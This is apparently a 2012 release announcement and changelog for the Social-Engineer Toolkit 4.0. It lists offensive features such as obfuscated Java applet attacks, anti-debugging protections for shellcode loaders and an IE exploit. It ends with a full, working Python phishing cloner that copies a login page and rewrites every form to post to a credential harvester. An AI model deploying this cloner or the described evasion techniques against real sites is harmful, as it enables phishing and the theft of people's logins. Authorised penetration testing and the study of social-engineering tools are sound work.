September 18, 2012
The Most Advanced Version of The Social-Engineer Toolkit To Date Released
Written by
David Kennedy
Security Testing & Analysis
Social Engineering
Welcome to one of the most advanced versions we have ever released. The Social-Engineer Toolkit (SET) version 4.0, codename "Balls of Steel", is officially available for public consumption. This version collects several months of development: over 50 new features plus a number of enhancements, improvements, rewrites, and bug fixes. To get the latest version of SET, install Subversion and run: svn co https://svn.trustedsec.com/social_engineering_toolkit set/
To highlight some of the major new features: the Java Applet attack has been completely rewritten and obfuscated, with added evasion techniques. All of the payloads are now heavily encrypted, with a number of anti-debugging protections in place. PyInjector is now available natively in the Java Applet attack and deploys shellcode automatically through a byte-compiled executable. The PowerShell attack vectors now support customized payload selection through config/set_config. A new attack vector, the Dell DRAC Attack Vector (default credential finder), has been added.
[Video: The Social-Engineer Toolkit (SET) v4.0 "Balls of Steel", David Kennedy on Vimeo]
A new Teensy payload has been added from the Offensive-Security crew: "Peensy", the auto-correcting attack vector with DIP switch and SD card. The web cloner has been completely rewritten in native Python, removing the dependency on wget. The new IE zero-day has been included in the Metasploit Web Attack Vector. The Java Repeater and Java Redirection have been rewritten to be more reliable. Obfuscation has been added to the randomized droppers, including the OSX and Linux payloads. Overall, there are far too many changes to report on here; the full changelog can be found below. Welcome to the new era of SET 4.0, the most advanced social-engineering toolkit.
~~~~~~~~~~~~~~~~
version 4.0
~~~~~~~~~~~~~~~~
* Added a new attack vector to SET, the Dell DRAC attack vector, under the Fast-Track menu.
* Optimized the new attack vector to use SET's standard core libraries
* Added the source code for pyinjector to the set payloads
* Added an optimized and obfuscated binary for pyinjector to the set payloads
* Restructured menu systems to support new pyinjector payload for Java Applet Attack
* Added new option to SET Java Applet - PyInjector - injects shellcode straight into memory through a byte compiled python executable. Does not require python to be installed on victim
* Added base64 encoding to the parameters passed to shellcodeexec and PyInjector
* Added a base64 decode routine to the Java Applet using sun.misc.BASE64Decoder; native base64 decoding in Java is painful
* Java Applet redirect has been fixed - was a bug in how dynamic config files were changed
* Fixed the UNC embed to work when the flag is set properly in the config file
* Fixed the Java Repeater which would not work even if toggled on within the config file
* Fixed an operand error when selecting high-numbered payloads; it caused a harmless error and an additional delay when selecting certain payloads in the Java Applet attack
* Added anti-debugging protection to pyinjector
* Added anti-debugging protection to SET interactive shell
* Added anti-debugging protection to Shellcodeexec
* Added virtual entry points and virtualized PE files to pyinjector
* Added virtual entry points and virtualized PE files to SET interactive shell
* Added virtual entry points and virtualized PE files to Shellcodeexec
* Added better obfuscation per generation on the SET interactive shell and PyInjector
* Redesigned the Java Applet, adding heavily obfuscated deployment methods
* Removed the Java Applet source code from public view; since the redesign, the applet uses techniques that obfuscate it dynamically each time, giving it a better shelf life
* Added a new config option to select the payload for the PowerShell injection attack; the config option lets you customize which payload gets delivered via the PowerShell shellcode injection attack
* Added double base64 encoding for better per-generation obfuscation (and because it's more fun)
* Added update_config(), run each time SET loads, to ensure that all config updates are present and in place when launching the toolkit
* Rewrote large portions of the Java Applet to be dynamic in nature and to use non-descriptive names throughout
* Added better stability to the Java Applet attack; note that there is a delay of a couple of seconds before execution due to the obfuscation techniques in place
* Completely obfuscated the Mac and Linux binaries, which are generated with a random name each time for deployment
* Fixed a bug that would cause custom imported executables to not always import correctly
* Fixed a bug that would cause a number above 16 to throw an invalid options error
* Added better cleanup routines for when SET starts to remove old cached information and files
* Fixed a bug when deploy binaries was turned off that caused an iterative loop in the PowerShell attack and crashed IE
* Centralized more routines into set.options - this will be where all configuration options reside eventually
* Added better stability when the Java Applet Repeater is loaded, the page will load properly then execute the applet.
* The site cloner has been completely redesigned to use urllib2 instead of wget; long time coming
* Cleaned up the cloner code for readability and efficiency
* Added better request handling with the new urllib2 modules for website cloning
* Added a user-agent string configuration option to the SET config, used by the new urllib2 fetching method
* Added a pause when generating Teensy payloads
* Added the Offensive-Security "Peensy" multi-attack vector for the Teensy attacks
* Added the Microsoft Internet Explorer execCommand Use-After-Free Vulnerability from Metasploit into the Metasploit Browser Exploits Attack vectors
* Fixed a bug in cleanup_routine that would cause the metasploit browser exploits to not function properly
* Fixed a bug that caused the X10 sniffer and jammer to throw an exception if the folder already existed
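The cloner items above (urllib2 instead of wget, a configurable user-agent string, better request handling) come down to two steps: fetch the page as a browser would, then rewrite it so it renders from the attacker's host and its forms post to a harvester. The following is an added example written for this page, not SET's cloner code: Python 3 urllib.request stands in for the urllib2 of the 2012 release, the USER_AGENT string and the HARVESTER_PATH of /post.php are assumptions, and SAMPLE_HTML is a constructed page so rewrite_page() can be run offline.

```python
import re
import urllib.request
from urllib.parse import urljoin

# Configurable like the new user-agent option in SET's config file; the
# string itself is an assumption, not SET's default.
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0"

# Where the cloned forms will post; hypothetical path on the attacker's server.
HARVESTER_PATH = "/post.php"


def fetch(url: str, user_agent: str = USER_AGENT, timeout: int = 10) -> str:
    """Fetch a page with urllib (urllib2 in Python 2), sending the configured
    User-Agent so the site serves the markup a real browser would get."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")


def rewrite_page(html: str, base_url: str, harvester: str = HARVESTER_PATH) -> str:
    """Make a fetched page stand alone and point its forms at the harvester.

    1. Absolutize relative src/href so images, CSS and scripts still load
       from the real site when the clone is served from our host.
    2. Replace every existing form action with the harvester path.
    3. Give forms that had no action attribute one too; otherwise they
       would post back to whatever URL the clone is served from."""
    html = re.sub(
        r'\b(src|href)="([^"]*)"',
        lambda m: '%s="%s"' % (m.group(1), urljoin(base_url, m.group(2))),
        html,
    )
    html = re.sub(
        r'(<form\b[^>]*?\baction=)(["\'])[^"\']*\2',
        lambda m: m.group(1) + m.group(2) + harvester + m.group(2),
        html,
        flags=re.IGNORECASE,
    )
    html = re.sub(
        r'<form\b(?![^>]*\baction=)',
        '<form action="%s"' % harvester,
        html,
        flags=re.IGNORECASE,
    )
    return html


def count_hooked_forms(html: str, harvester: str = HARVESTER_PATH) -> int:
    """Number of forms whose action now points at the harvester."""
    return len(re.findall(r'action=["\']%s["\']' % re.escape(harvester), html))


def clone_site(url: str, out_path: str) -> int:
    """Fetch, rewrite and write the clone; returns the number of forms hooked."""
    page = rewrite_page(fetch(url), url)
    with open(out_path, "w", encoding="utf-8") as fh:
        fh.write(page)
    return count_hooked_forms(page)


# Constructed sample page (not fetched from anywhere) for a stand-alone run.
SAMPLE_HTML = (
    '<html><head><link rel="stylesheet" href="/css/site.css"></head><body>'
    '<form method="post" action="/login"><input name="user"><input name="pass"></form>'
    '<form id="search"><input name="q"></form>'
    '<img src="img/logo.png"></body></html>'
)

if __name__ == "__main__":
    print(rewrite_page(SAMPLE_HTML, "https://example.com/account/login"))
```

Regex rewriting is what a quick cloner does and is enough for static login pages; forms built by JavaScript after load, or submitted via XMLHttpRequest, are not caught, which is one reason a clone that looks right still fails to harvest. When reviewing your own site for how easily it clones, the same absolutize-and-rehook pass is a fast way to see which resources an attacker's copy would still pull from you (and which therefore show up in your logs with a foreign Referer).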